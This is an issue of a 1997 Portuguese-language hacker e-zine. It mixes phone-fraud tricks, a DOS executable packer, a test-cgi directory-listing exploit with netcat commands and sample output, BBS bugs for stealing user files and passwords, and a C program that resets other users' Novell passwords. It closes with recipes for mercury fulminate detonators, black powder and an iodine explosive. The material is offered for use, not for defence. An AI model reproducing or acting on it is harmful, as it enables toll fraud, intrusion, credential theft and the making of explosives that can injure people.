- - - - - - - - - Este metodo so funciona em telefones antigos! Aqueles na base da fichinha ou da moedinha ( se estiver nos Eua, usa o Rex Box ). Por exemplo: O numero que vc quer ligar e' 823-26-47 ( numero ficticio ) Primeiro vc deve dimunuir de 10 todos os numeros que compoem o telefone a se ser discado, no caso esse telefone ficaria. Numero a ser discado: 823-26-47 ORIGINAL_______ | (8-10)=2 (2-10)=8 (3-10)=7 (2-10)=8 (6-10)=4 (4-10)=6 (7-10)=3 |_______ NOVO NUMERO O novo numero sera: 287-84-63 O que vc vai ter que fazer e' bater no bocal do telefone o numero de ve- zes correspondente a subtracao. Bata 2 vezes no bocal ( intervalo de 2 segundos ) Bata 8 vezes no bocal ( intervalo de 2 segundos ) Bata 7 vezes no bocal ( intervalo de 2 segundos ) Bata 8 vezes no bocal ( intervalo de 2 segundos ) Bata 4 vezes no bocal ( intervalo de 2 segundos ) Bata 6 vezes no bocal ( intervalo de 2 segundos ) Bata 3 vezes no bocal ( intervalo de 2 segundos ) Desta maneira vc podera fazer ligacoes gratuitamente... Quando estiver agil podera ligar mais rapido, ai fica facil! Ligando de telefone celular sem pagar - by AciDmuD - - - - - - - - - - - - - - - - - - - Bom, esse metodo foi observado por mim e foi confirmado por muitos amigos. De inicio pode parecer falso mas funciona sim pelo menos no estado do Rio Grande do Sul e em Santa Catarina onde foi feito os testes. E' o seguinte: Voce tem que ligar para um numero normal, vamos pegar o exemplo de um numero de celular. Ex: 928-13-47 Olha, nem sei se este numero existe e se existe nao conheco o dono do numero, nao vao ligar pra ele e pedir informacoes! ;)) Entao devemos pegar o ultimo numero do telefone a ser discado, no caso o 7... subtraimos ele de 10, o que vai resultar o numero 3. Somente vamos acrescentar o numero 3 ao final do numero discado. O resultado vai ficar: Numero ligado sem pagar: 928-13-47-3 Heheheheh! Itz so eazy Nao teste isso como um louco, faca um ou duas ligacoes que realmente sejam significantes no valor e espera a conta telefonica. Obs. Nao conte isso pra ninguem! heheheheh ;) Phucking block line - by AciDmuD & VooDoo - - - - - - - - - - Essa tecnica e' meio forcada, mas funciona. Nosso alvo sao aqueles aparelho que bloqueiam chamadas telefonicas o tao temido BLOCK LINE. Bem isso e'soh uma parte pq ja estamos imaginando uma materia futura so- bre o sistema mas o englobando de forma muito melhor e falando mais dos detalhes tecnicos. Por enquanto espero isso quebre o galho... Primeira coisa que vcs devem fazer e' descobrir se o problema e' realmen- te o BLOCK LINE e se a linha nao foi bloqueada na companhia telefonica. Antes de tudo olhe se a senha padrao que e' 222 nao foi mudada. Agora procuro o telefone principal da casa, aquele que quando desligado desliga a todos da casa. Acho? Beleza, abra ele com uma chave de fenda e procure uma caixinha pre- ta escrita block line. Abra agora tb o block line, com cuidado pra nao quebrar. Apos ter feito isso tire a pelicula que cobre a placa do aparelho block line e exponha o circuito a luz fluorescente ( raios ultra-violeta). Pronto, vc apagou todas informacoes da placa... Agora e' claro que os pessoas nem vao desconfiar qual o problema ;) Be happy! Phuck and phreak ;) }-===============================[chain]===============================-{ 5-) ESTRUTURA DE EXEs ~~~~~~~~~ ~~ ~~~~ Esse texto foi escrito inicialmente em marco de 1995, alterado agora por csh para atender as necessidades da ezine. Se voce nao esta' interessado na teoria e queira somente o programa EXEload, procure-o nas melhores BBS do ramo. :)) Ou simplesmente compile os fontes!! (ohh!!) Sentindo a falta de um bom material nessa area, resolvi escrever uma ma- teria, falando sobre os EXEcutaveis, abrangendo principalmente a uma i- deia de protecao quanto ao seu programa. Vamos partir da seguinte hipotese: 1) voce faz um programa seja la em que linguagem for, e aplica um PKLITE(tm), tendo em vista a compactacao e a protecao quanto ao chamado "crack" ao mesmo. 2) hoje em dia, existem programas como o StickBuster, dislite, etc.. que retiram a protec"o do PKLITE e reescrevem o pro- grama originamente deixando perfeito para a acao dos "crackers"(ou "crackeadores" como queiram chama-los :) ). Ex.: Suponha que vc faca um programa bem simples como o su- gerido abaixo: -------8<------8<-- EXEMP-001.PAS --8<------8<----- begin WriteLn( 'csh kick''ass!!'); halt; end. -------8<------8<-- EXEMP-001.PAS --8<------8<----- Se voce usar um programa do tipo Norton DiskEditor(tm), vc vai perceber a existencia EXATA da string "csh kick''ass!!" sendo assim, apenas a ma-vontade de mudar a string para "I was here" ou algo do genero... Bom, chegando de hipoteses vamos ao que interessa, afinal, isto e' a area de programacao, nao '? Para quem nao conhece a estrutura de um arquivo .EXE, la vai uma rapida explicacao: Um arquivo .EXE possui um header, uma tabela de relocacao e o EXE propriamente dito ( isso parece colegio!!).. O realmente e' mais complexo e' o header, entao.... WORD ID ; Id de EXE.. normalmente MZ mas ; pode conter ZM WORD bytemod ; carrega modulo do tamanho ; imagem mod 512 WORD pages ; tamanho do arquivo (incluindo ; header) div 512 WORD reloc_items ; Numero de itens da tabela de ; relocacao WORD size ; Tamanho do header em ; paragrafos de 16 bytes WORD minpara ; Numero min de paragrafos sobre ; prog. WORD maxpara ; Numero max de paragrafos sobre ; prog. WORD SSREG ; Conteudo para o registro ; SS(stack segment) WORD SPREG ; Conteudo para o registro ; SP(stack pointer) WORD CHKSUM ; Checksum (SEM USO HOJE EM DIA) WORD IPREG ; Conteœdo para o registro ; IP WORD CSREG ; Conteudo para o registro ; CS(code segment) WORD RELOCOFF ; off-set da tabela de relocacao WORD OVERLAY ; ate hoje nao descobri a ; utilidade disso!! A tabela de relocacao e' muito facil, sao ponteiros que indicam uma posicao de memoria que devem ser incrementados de acordo com o PSP(program segment prefix) Com base dessas informacaes, fica a pergunta: "Mas como vamos fazer para proteger nossos programas?". A reposta pode ser dada de varias maneiras. A minha opiniao ' de nao fazer magica mas sim se previr desse programas alÿ DISLITE.. Suponha que temos akele exemplo la em cima(EXEMP-001.PAS). Apliquemos . ele o famoso LZEXE. Todos os dados estao perfeita- mente criptografados. Mas tem um por'm.... Os programinhas que tiram as compactacaes vao funcionar nele, ai entra o meu racio- cinio: VAMOS APLICAR A ESSE .EXE, UM LOADER!!! Ohhh!! um loader, mas para que, e como, um loader?!? E' muito simples. Faremos um .COM "hibrido" para atuar como um .EXE. E' mais ou menos assim que atuam programas do tipo EXEPACK, LZEXE, PKLITE, etc, etc etc.... Podemos ate', e por que nao, fazer uma rotina de compactacao simples para o header do executavel. Vamos ao algoritimo de compressao do header... O que vamos comprimir de fato, e' a tabela de relocacao. Veja abaixo. Esta e' a tabela de relocacao do exemplo acima SE NADA FOI ALTERADO!! :)) 0000:001D \ 0000:0027 \ 0000:0038 | Vc pode observar a repeticacao de segmentos, 0000:003D | constatando: 0000:0042 | 0000:0049 | 7 x 0000 0000:0051 | 7 x 0006 0006:0001 | 0006:011B | 0006:0310 | 0006:06D1 | 0006:06EC | 0006:0702 / 0006:0721 / Vamos montar uma tabela na memoria diferente dessa, partindo do principio que o segmento ' 0000 entao, o algoritmo de compacta cao: A = 0 ; sao inicializados A,P com zero... P = 0 ; para um buffer onde conterÿ o conteudo compacto repetir EXEheader.reloc_items vezes R = relocacao ; as relocacaes sao SEMPRE sequenciais.. SEGMENTO de R diferente de A ? ( A = SEGMENTO de R P-> FFFF P++ P-> A P++ ) P-> OFFSET de R P++ fim do repetir P-> FFFF P++ P-> FFFF Espero ter sido o mais claro e generico possivel... :)) Se aplicassemos esse algoritimo na tabela de nosso cobaia, seria gerada essa tabela: 001D 0027 0038 003D 0042 0049 0051 FFFF 0006 0001 011B 0310 06D1 06EC 0702 0721 FFFF FFFF Pensando nesse aspecto, ganhariamos 20 bytes no header. (ohhhh!!). OBS: "Quero dizer que esse metodo nao e' o mais eficiente em termos de compactacao mas onde queremos aplica-lo nao ha necessidade nem interesse em apresentar um algoritimo mais complexo." Ja temos a rotina de compactacao... e a descompactacao? ...Essa e' sem duvida a parte MAIS facil desse processo. Veja o algoritmo ja no programa LOADER.ASM -------8<------8<-- LOADER.ASM --8<------8<----- code SEGMENT PARA PUBLIC 'code' ASSUME cs:code, ds:code, es:code, ss:code LOCALS .8086 ; ick!!! "mas vamos pensar na compatibilidade!!" :)) ORG 100h ; bah!!! :)) start: JMP r_start ; isso aki embaixo vai funcionar do tipo a uma pilha strCS dw 0 ; no de paragrafos onde comecara' o programa.. oldCS dw 0 oldIP dw 0 oldDS dw 0 oldES dw 0 papoAlaPKLITE db 'EXEloader v1.0',0 r_start: ; UMA SACANAGEM..... ; vamos fazer um checksum do papoAlaPKLITE e se nao for igual ; cai fora. ; o checksum da 126.. como? some todos os valores ASCII EM BYTES ; COM ; OVERFLOW... ; faremos uma inicializacao.. mov cs:[oldDS], ds ; isso parece maluquice mas e' real!! mov cs:[oldES], es ; so estou colocando DS e ES na minha"PILHA" push cs pop ds ; Make sure DS=CS mov di, offset papoAlaPKLITE xor al, al chksum: mov ah, [di] add al, ah inc di cmp ah, 0 jne chksum cmp al, 126 ; e' o papo? je continue mov ax, 4c00h int 21h continue: mov si, OFFSET SORT ; Start Of Relocation Table.. k00l!! mov ax, cs add cs:[strCS],ax ; begin of code mov es, cs:[strCS] ; vamu discumprimi e faze as relocucao.. desc: lodsw cmp ax, 0ffffh jne reloc ; faz relocacoes lodsw cmp ax, 0ffffh je run ; comeca o programa add ax, cs:[strCS] mov es, ax jmp desc ; faz a relocacao reloc: mov di, ax mov ax, cs:[strCS] add es:[di], ax jmp desc ; executa. run: ; coloca no lugar, ds e es mov ds, cs:[oldDS] mov es, cs:[oldES] mov bx, cs:[oldIP] mov ax, cs:[oldCS] add ax, cs:[strCS] push ax bx retf SORT dw ? ; aki vai a tabela compactada.... EASY, nao? code ENDS END start -------8<------8<-- LOADER.ASM --8<------8<----- Para quem nao tem um assemblador, aki vai um "DUMP", que tbem sera' usado mais tarde... eb 1a 90 00 00 00 00 00 00 00 00 00 00 45 58 45 6c 6f 61 64 65 72 20 76 31 2e 30 00 2e 8c 1e 09 01 2e 8c 06 0b 01 0e 1f bf 0d 01 32 c0 8a 25 02 c4 47 80 fc 00 75 f6 3c 7e 74 05 b8 00 4c cd 21 be 8a 01 8c c8 2e 01 06 03 01 2e 8e 06 03 01 ad 3d ff ff 75 0f ad 3d ff ff 74 14 2e 03 06 03 01 8e c0 eb eb 8b f8 2e a1 03 01 26 01 05 eb e0 2e 8e 1e 09 01 2e 8e 06 0b 01 2e 8b 1e 07 01 2e a1 05 01 2e 03 06 03 01 50 53 cb Agora ja temos o loader, vc nao acha que esta' faltando algo? Um linker..... O que e' um linker?!?! Seria um PKLITE da vida propriamente dito.... -------8<------8<-- EXELOAD.PAS --8<------8<----- { EXEloader v1.0 A then begin A:=r.Segment; rTable[ p]:=$ffff; inc( p); rTable[ p]:=A; inc( p); end; rTable[ p]:=r.Offset; inc( p); end; rTable[ p]:=$ffff; inc( p); rTable[ p]:=$ffff; sTable:=p; end; { ššššššššššššššššššššššššššššššššššššššššš êê} procedure LoadAndConvertheader; {êêê ááááááááááááááááááááááááááááááááááááááááá Load, Convert Header and Save it up!!! } type pWord=^WORD; var fName: string; siz: word; i,j: word; dataBegin: longint; buff: pointer; begin fName:=paramstr( 1); if pos( '.', fName)=0 then fName:=fName+'.EXE'; assign( exeFile, fName); reset( exeFile, 1); assign( tmpFile, 'EXELOAD.$$$'); rewrite( tmpFile, 1); move( Loader_Data, myLoader_Data, Loader_Size+1); BlockRead( exeFile, hdr, sizeof( tHeaderEXE)); if hdr.ID<>EXE_ID then begin WriteLn( 'File isn''t a EXE file!'); halt( 2); { automatic close file.. DOS 3.30 or higher! } end; ProcessRelocation; siz:=Loader_Size+1+(sTable+1)*2; { Now, the hardest thing.... The reconstruction of the header } with hdr do begin dataBegin:=size*$10; reloc_items:=0; { ohh!! we dont have relocations!! its a .COM!! } inc( pages, siz div $200); i:=bytemod+(siz mod $200); if i>$200 then inc( pages, i div $200); bytemod:=i mod $200; size:=2; j:=(siz div 16)+1; if (siz mod 16)=0 then dec( j); pWord( @myLoader_data[ 3])^:=$10+j; pWord( @myLoader_data[ 5])^:=codeseg; pWord( @myLoader_data[ 7])^:=ipreg; codeseg:=$fff0; ipreg:=$100; end; blockwrite( tmpFile, hdr, sizeof( tHeaderEXE)); close( tmpFile); reset( tmpFile, 1); seek( tmpFile, $20); blockWrite( tmpFile, myLoader_Data, Loader_Size+1); blockWrite( tmpFile, rTable, (sTable+1)*2); seek( tmpFile, (j+2)*$10); seek( exeFile, DataBegin); getmem( buff, 4096); { Provide a copy } i:=4096; while i=4096 do begin blockread( exeFile, buff^, 4096, i); blockwrite( tmpFile, buff^, i); end; close( tmpFile); close( exeFile); erase( exeFile); rename( tmpFile, fName); freemem( buff, 4096); end; begin WriteLn('EXEload v1.0  y csh (C) 1995'); LoadAndConvertheader; end. -------8<------8<-- EXELOAD.PAS --8<------8<----- Espero que isto seja suficiente para o entendimento do "ESQUEMA"... O programa pode ser totalmente modificado, etc.. etc.. Em 1994, vi rolar uns papos sobre seguranca, passwords e cia ltda en- tao resolvi (so agora!!) escrever esse exemplo. Meu tempo e' super pequeno e estou trabalhando em 12 programas simul- taneos, que consomem todo o meu tempo (fora os estudos, obvio). Se alguem esta realmente interessado nisso e queria resolver alguma duvida, so me manda um reply please... Mas nao venha com perguntas do tipo: "mov serve pra que mesmo?" ou "o que e' stack?!" . bah! Um conhecimento minimo e' requerido para entendimento disso. Hehe mais uma coisa: "EU, csh, NAO ME RESPONSABILIZO PELA UTILIZACAO DESSE PROGRAMA, POIS ESSE TEM COMO OBJETIVO APENAS O ENTENDIMENTO DE COMO PROTEGER SEUS PROGRAMAS. USE-O, MODIFIQUE-O, FACA QQUER COISA MAS EM CASO DE PERDA DE DADOS, VIRUS, OU QUER OUTRA COISA Q POSSA ACON- TECER NAO ME PROCESSE POR FAVOR!" EXEload e' ideia de: csh! Por enquanto podem entrar em contato com o csh pelo email - axur05@hotmail.com - Na proxima edicao ele ja vai ta com um email ;) }-===============================[chain]===============================-{ 6-) VULNERABILIDADE do test-cgi em alguns setups! ~~~~~~~~~~~~~~~ ~~ ~~~~~~~~ ~~ ~~~~~~ ~~~~~~~ Programa efetado: ----------------- Test-cgi's scripts encontrado em varios web servers. Consequencias: -------------- Qualquer um pode olhar os arquivos da maquina How about: ---------- Em muitos web sites existem arquivos chamados de test-cgi quase sempre no diretorio cgi-bin ou algum lugar similar ). Existe um problema com muitos destes arquivos test-cgi . Se seu arquivo test-cgi contem a chamada linha ( verbatim ) entao voce provavelmete esta vulneravel ao bug. echo QUERY_STRING = $QUERY_STRING Todas essas linhas possivelmente tem as variaveis abertas ou perdidas sem aspas ("). Sem essas aspas alguns caracteres especiais ( especifi cadamente o '*') sao expandidos onde eles nao poderiam. Enviando entao um query de '*' vai voltar as informacoes do diretorio corrente ( provavelmente onde todos os arquivos do vgi estao... lah no jj e no phf. Bom, o que sao esses outro cgi's que eu nunca vi...? e que furo que tem nele? Mandando um query do '/*' vai listar o diretorio do root! ;) Isso e' o mesmo que faz o `echo *` quando vc dah o ls Este e' o meio mais facil de lista diretorio e ate dar um cat neles via a string do query. Quase sempre e' possivel de fazer a mesma coisa atraves de muitas outras variaveis ( ie $REMOTE_HOST, $REMOTE_USER, etc.) e' claro que em certas situacoes. Como arrumar: ------------ Pq arrumar? ;) deixa assim cumpadi! Vamos x-ploitar... ------------------ Bom vamos fazer um teste... mas pra isso temos que sempre procurar o telnet na porta 80 do provedor que sera a vitima. ------------------ machine% echo "GET /cgi-bin/test-cgi?/*" | nc vitima.lamah.com 80 CGI/1.0 test script report: argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = vitima.lamah.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = ------------------ Ou pra ver o que outros cgi's per ai... ------------------ machine% echo "GET /cgi-bin/test-cgi?*" | nc vitima.lamah.com 80 CGI/1.0 test script report: argc is 1. argv is \*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html mail-query mail-query-2 majordomo majordomo.cf marker.cgi menu message.cgi munger.cgi munger.note ncsa-default.tar post-query query smartlist.cf src subscribe.cf test-cgi uptime REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = Nao sei se expliquei bem.. em todo caso pesquisem o caso! AciDmuD - 1997(c) Global Domination Inc. - acidmud@thepentagon.com - }-===============================[chain]===============================-{ 7-) FINAL DA LISTA DE COMANDOS UNIX ~~~~~ ~~ ~~~~~ ~~ ~~~~~~~~ ~~~~ Oia! Nao deu tempo de preparar esta parte nao, eu sei que tinha prometido mas como quero preparar algo bom mesmo fica pra AXUR05 numero 2. Por favor, o nome da revista ‚ AXUR05 e nao quer dizer que a revista esta no seu 5 numero... ;) Como tem lamer que me pergunta, "Por favor, me manda o numero 1, 2, 3 e o 4 que eu soh tenho o numero 5." Hehehhe... Esperam pra proxima edicao a parte final da maior lista de comando unix compilada em portugues. AciDmuD - 1997(c) Global Domination Inc. - acidmud@thepentagon.com - }-===============================[chain]===============================-{ 8-) BBS INESCRUPULOSAS ~~~ ~~~~~~~~~~~~~~ Voce deve conhecer pelo menos um ou dois BBS de grande porte que cobram muito caro e nao oferecem um servico esperado. Nessas BBSs , o operador nao quer nada mais alem do que o seu di- nheiro ou seu lindo numero de cartao de credito... Voce e' feio ou bonito? Inteligente ou uma anta? Nao interessa, para eles o que interessa e' seu dinheiro. Exemplo: Voce acessa pela primeira vez uma dessas , e o que voce pode acessar? NADA! So' pode mandar msgs para o SysOp, e nem adianta esperar reply, porque para ele voce e' um im- becil. Chama-lo para chat? Nem adianta. Ele nem ouve o sinal... Mas e' so' pagar, depositando uma grana na conta do BBS ou fornecendo o numero do seu credicard que o tra- tamento muda totalmente. Areas e mais areas de arquivos, o SysOp atende toda vez que vc chama e coisa e tal. Acabou o mes? Ok, voce se tornou de novo um imbecil. Isso precisa acabar! Precisamos dar um pe' no traseiro desses idi- otas donos ou sysops de BBS. E o acesso gratis `a internet entao? Aquelas lojas em que voce compra um computador e recebe horas gratis na internet atraves de um BBS. Tudo bem, voce mora no interior e o BBS e' na capital , mas voce ja esta' empolgado mesmo. Ligando no servico de atendimento do BBS, voce constata que, alem de ter de fazer a ligacao interurbana, ain- da precisa assinar o BBS e comprar o soft de navegacao (que o BBS vende) Resultado: alem de morrer na grana do interurbano e no aces- so ao BBS, voce ainda gasta 50 pau para comprar a merda do browser! [ Moral da historia:Voce e' um dos muitos que sao explorados por esses BBS's e nao agem de forma alguma pra que este qua- dro do CyberSpace mude!!! Estamos precisando de mais acao! ] BBZs DIRIGIDAS POR LAMAH'S Voce tambem ja deve ter acessado em alguns desses.O ZyZop, geral- mente uma crianca que nem sabe da vida , alem de ter um sistema po- dre, faz gracinhas com voce, se dizendo o hacker. Conheci um espe- cime desses, que rodava uma board em PCBoard e nem sabia o que era um PPE! O que aconteceu, adivinha?Foi deletado!!!Ri muito!!!Um cara entrou num backdoor e fudeu tudo. Esses ZyZoP'z sao , em maioria , mauricinhos filhos da puta e mima- dinhos que tem um Pentium 166 e provavelmente compraram o BBZ de um cara esperto , que deve ter vendido muito caro. Em muitos dos casos, o cara que deleta o bbz e' o mesmo que o ven- deu para o lamer. CONSIDERACOES FINAIS Amigos do mundo underground , uni-vos! Precisamos acabar com lixos como esses. ALGUNS BUG'S PRA TE DEIXAR MAIS "ESPERTO" CONTRA TAIS EXPLORACOES! # SyZTeM > PCBoard 15.x # -: Caso vc seja um novo usuario, ou seja, teu nivel de acesso nao permita fazer praticamente nada, execute tal bug para que voce possa pegar file que esteja nos dir.'s da bbs : l - (filenanme) - (areaname) d - ns [ENTER] Pronto... o file ja esta marcado, basta agora fazer o download! -: Para conseguir maior tempo de acesso : Entre na area livre da bbs, marque qualquer file e faca o download. Pule pro seu OS, e entre no dir. onde se localiza o file, logo apos vc devera usar um porgraminha, cujo nome e' hexed.exe, onde ira edi- tar tal file (nao importa se esteja compactado) e tira somente 1 bt Volta novamente pro teu programa de comunicacao e puxe novemente o mesmo file pelo protocol ZMODEM. Agora... volte pro main mnu da bendita bbs, e da uma olhadinha no teu tempo de acesso! :) # SyZTeM > PCBoard & RA (aLL VeRSioN) -: Para conseguir roubar qualquer file do HD do SySoP , inclusive o users.dat da bbs! Basta ter um programa de comunicacao com o protocol BiMODEM e o sis- tema HOST tambem. Mas caso teu programa nao tiver tal protocol, bas- ta instalar um... nao e' dificil de achar! Well... vc esta conectado na bbs, agora, faca o upload de qualquer file. Durante a transferencia (por protocol BiMODEM) vc tera a opcao de fazer o download...e pronto! Puxe o users.dat do HD HOST, mas an- tes, vc tera que descobrir em que dir. se encontra tal file! :) MAs isto e facil.. puxe o autoexec.bat dele, e verifique qual o board que ele esta carregando, e em que path esta localizado, consequente- mente, vc sabera onde esta o users.dat! NOTA: este bug's sao basicos, mas vc tera um bao progresso com eles! :) =+=---------------- kS_5 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 9-) CODIGOS EMSi ~~~~~~~ ~~~~ Numa bela madrugada... quando estava acessando uma bela BbS, o qual nao irei divulgar o nome, descobri que alguns gerenciadores usam codigos IEMSi para exercer algumas tarefas com o REMOTO. Mas como, felizmente, estava usando um programa de comunicacao que nao aceitava tais codigos, foi possivel eu tirar uma lista quase que detalhada de todos os codigos usados por tais bbs's!!! [ Logo quando apareceu a primeira tela de apresentacao... onde deve colocar o login e tudo mais pra acessa-la, apareceu o seguinte EMSi: IRQ8E08. Achei bastante estranho nao vir com alguma funcao, mas foi ai que tudo comecou... :)) ] =+=--------------- [ LiSTaGeM DoS EMSi'S ] **EMSI_IRQ8E08 : Envia Dados (Nome, Senha, Tel, Etc) **EMSI_IIR61E2 : Desativa o Envio de Dados **EMSI_ICI00C3 : Cabecalho dos dados a enviar **EMSI_CHTF5D4 : Chat **EMSI_TCH3C60 : Chat Off **EMSI_ACKA490 : CRC ERROR - Reenvie Dados **EMSI_NAKEEC3 : CRC ERROR - Desconheco **EMSI_REQA77E : Desconheco **EMSI_IN9C816 : Desconheco =+=--------------- [ FuNCoeS eXeRCiDaS ] Estas sequencias sao enviadas normalmente por um programa de comunicacao quando recebe o **EMSI_IRQ8E08 **EMSI_ICI00C3{Nome do Usuario}{}{Cidade \2F Estado \2F Pais}{telefone}{} {SENHA}{N§ Do registro}{Terminal,24,80,0}{ZAP,ZMO,KER}{CHT,TAB,ASCII8} {HOT,MORE,FSED,NEWS,MAIL,CLR}{Nome do Programa,Versao ,Nome da pessoa registrada}{}1CB4EEC8 1 -: **EMSI_IRQ8E08 **EMSI_IIR61E2 Se voce enviar o **EMSI_IRQ8E08, vc recebera os dados, e se voce Digitar logo apos **EMSI_IIR6E2 vc fara com que o usuario nao perceba o que aconteceu. 2 -: **EMSI_CHTF5D4 **EMSI_TCH3C60 Servem para entrar no chat e sair dele, mas tambem Podem ser usa- dos para desconectar uma pessoa por insistencia, tipo colocar um CHTF5D4 ou melhor um IRQ8E08 em uma mensagem e ele nao conseguira sair da tela do chat (se for um usuario inexperiente). 3 -: **EMSI_ACKA490 Apenas o que eu sei sobre este comando, e' para reenviar dados, tipo se vc dar um IR8E08 e logo depois um ACKA490 ele re-enviara a tela com os dados. 4 -: **EMSI_NAKEEC3 Aparece quando houve um erro de crc no EMSI. =+=--------------- [ oBSeRVaCoeS FiNaiS ] # Quem quiser se livrar dos IR8E08 basta desativar o emsi no programa de comunicacao que esta usando. # Tais comandos EMSi so funciona se o usuario estiver usando um prograna de comunicacao onde se aceita EMSi (LOGICO!!! :)) ) # Os comandos que nao foram incluidos nesta lista foi pq ficaram como des- conhecidos, ou seja, nao consegui descobrir! :) =+=--------------- kS_5 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 10-) MUDANDO SENHAS EM REDE NOVELL ~~~~~~~ ~~~~~~ ~~ ~~~~ ~~~~~~ Como nao podiamos deixar de fora, ai esta a fonte de um programinha em C que muda as senhas de usuarios em rede novell sem sua permissao. Nunca tentamos com a senha do supervisor, mas se voce tiver a oportunida- de faca-o. Programa desenvolvido por P.R. Lees dedicado especialmente aos estudantes que querem sacanear seus colegas nos cursos onde rodam siste- ma em rede. CORTE AQUI------------------------SETPWD.C-------------------------------- /* SETPWD 1.0 - Sets a Novell User Password Copyright (C) 1992 P.R.Lees */ #include #include #include #include #include #include #include main(int argc,char *argv[]) { int err; printf("[SetPwd.nlm (c) 1992 P.R.Lees]\n"); if (argc!=3) { printf("Usage:\n\tLoad SetPwd \n"); exit(2); } err=ChangeBinderyObjectPassword(argv[1],OT_USER,"",strupr(argv[2])); if (err) { switch(err) { case 150:printf("Server out of Memory\n");break; case 215:printf("Password is not unique\n");break; case 240:printf("Wildcard not allowed\n");break; case 251:printf("No such Property\n");break; case 252:printf("No such Object\n");break; case 254:printf("Server bindery locked\n");break; case 255:printf("No such object or Bad Password\n");break; default:printf("Netware Error 0x%X (%d)\n",err,err);break; } exit(err); } printf("Password of %s has been set to %s\n",strupr(argv[1]),strupr(argv[2])); exit(0); } CORTE AQUI------------------------SETPWD.C-------------------------------- Corte na parte indicada, cole em um arquivo e compile normalmente. AciDmuD & VooDoo 1997(c) Global Domination inc. - acidmud@thepentagon.com - }-===============================[chain]===============================-{ 11-) ANARCHY ~~~~~~~ Meus amigos... a parte de anarchy a ultima revista pode ter sido legal e tudo mais, mas acho q teremos que parar um pouco, recebemos mails de um pessoal falando que nos estamos cometendo crime e instigando terrorismo sendo que qualquer fato que ocorrer relacionado com o conteudo da parte de anarchy sera de nossa inteira responsabilidade. Nao tem coisa que eu mais odeio do que pegarem um pequeno anarquista e ele falar " Pq vc vai me prender se foi o HaphazarD que me ensinou..."caralho! Soh faz quem quer. Teve tambem um promotor de justica de Sao Paulo que ba- teu um papo com o AciDmuD, e disse que poderia indicia-lo juntamente com os outros membros da revista como co-autores de crimes de terror. Bull shit! Vamos continuar sim... nao sei se nesta ou na proxima edicao, mas que nos vamos continuar com a parte de Anarchy nos vamos, pois sei que a galera faz a festa. ;) TEXTO ESCRITO POR: kS_5 Sempre ouvi falar por ai q no Brasil nao existe gente competente o bastante para escrever alguns textos legais pra galera, do tipo "como fazer um dina- mite" , etc e tal... Entao, foi justamente pensando nisso q eu(kS_5), com a ajuda de um grande colega meu, preparamos estas "receitinhas" pra vc! :) Nem todas estas formulas foram analisadas por mim(na pratica). Mas de acor- do q estao descritas.. acho q nao havera problema algum, a nao ser q vc fi- que olhando pra essas formulas "malucas" sem enter porra nenhuma! :)) ATENCAO!: CUIDADAO AO REALIZAR AS EXPERIENCIAS E FACA TUDO SOBRE CUIDADO DE UM ADULTO! AHHH... SERIA BAO TAMBEM ARRUMA UM BAO LIVRO DE QUIMICA! :))) --=+=--- DETONADOR ---=+=--- Caracteristicas: - Explode a 180 graus celcius; - Alto poder calorifico; - Usado como detonador de bombas maiores. Nome cientifico: Fulminato de mercurio (Hg[ONC] ) 2 Procedimento experimental: Derrama-se em 250 partes de alcool etilico (C H O), nitrato de mercurio 2 6 (Hg[NO ] )(perparado com 25 partes de mercurio e 300 partes de acido nitrico) 3 2 Aquece-se ligeiramente (NAO MAIS QUE 60 GRAUS!!!). O fulminato se deposita como agulhas brancas. Adiciona-se 30% de agua, ele pode ser pulverizado (Amassado) e transformado em uma pasta. Coloque algumas gotas de nitrato de potassio (KNO ) ou de sodio (NaNO ) e enxofre em pequena quantidade. 3 3 Faz-se as espoletas colocando-se o produto seco entre duas folhas de latao. --=+=--- Polvora Negra e Fosforos ---=+=-- 12% de carbono (C) /carvao mineral; 13% de enxofre (S) (de preferencia resublimado) /enxofre de farmacia; 75% de nitrato de potassio (KNO ) ou de sodio (NaNO ) /salitre; 3 3 OBS1: As porcentagens sao em peso. OBS2: Se usar os reagentes opcionais (salitre, carvao mineral, enxofre de farmacia) as porcentagens poderao mudar, dependendo do teor de pureza. Se voce quiser fazer aqueles fosforos americanos, que podem ser "riscados" em qualquer lugar, coloque agua na polvora acima ate' formar uma pasta bem viscosa e molhe a ponta de um palito de madeira (de preferencia pinho)nessa pasta, espere secar. Uma melhoria interessante seria umedecer a ponta do palito que vai ser mergulada na polvora com resina vegetal de pinheiro. --=+=--- BIRIBINHA DE IODO ---=+=-- Preparar uma solucao concentrada (15 gr/ 100ml de agua) de iodeto de potas- sio (KI). Juntar cristais de iodo resublimado (I2 ) ate que a solucao fique bem preta. Adicionar ent1o Hidroxido de amonio (NH4OH) (CUIDADO! Irritante.) em ligeiro execesso, ate que se forme um precipitado preto. Filtrar e con- servar o precipitado umido. OBS1: Coloque pouco KI e pouco Iodo pois o volume de hidroxido de amonio usa- do e' muitas vezes maior que o de iodo+KI. OBS2: Essa bomba so faz barulho... OBS3: Se quando explodir soltar muita fumaca vermelha, indica que voce colo- cou muito iodo ou pouco hidroxido de amonio. --=+=--- FEDOZINHO ---=+=-- Por Sulfeto de ferro (FeS) com acido cloridrico e deixar descansar... Aconselho sair de perto... mas caso vc quiser sentir o cherim gostos de mer- da, fica por lah mesmo! :) --=+=--- GAS DO RISO 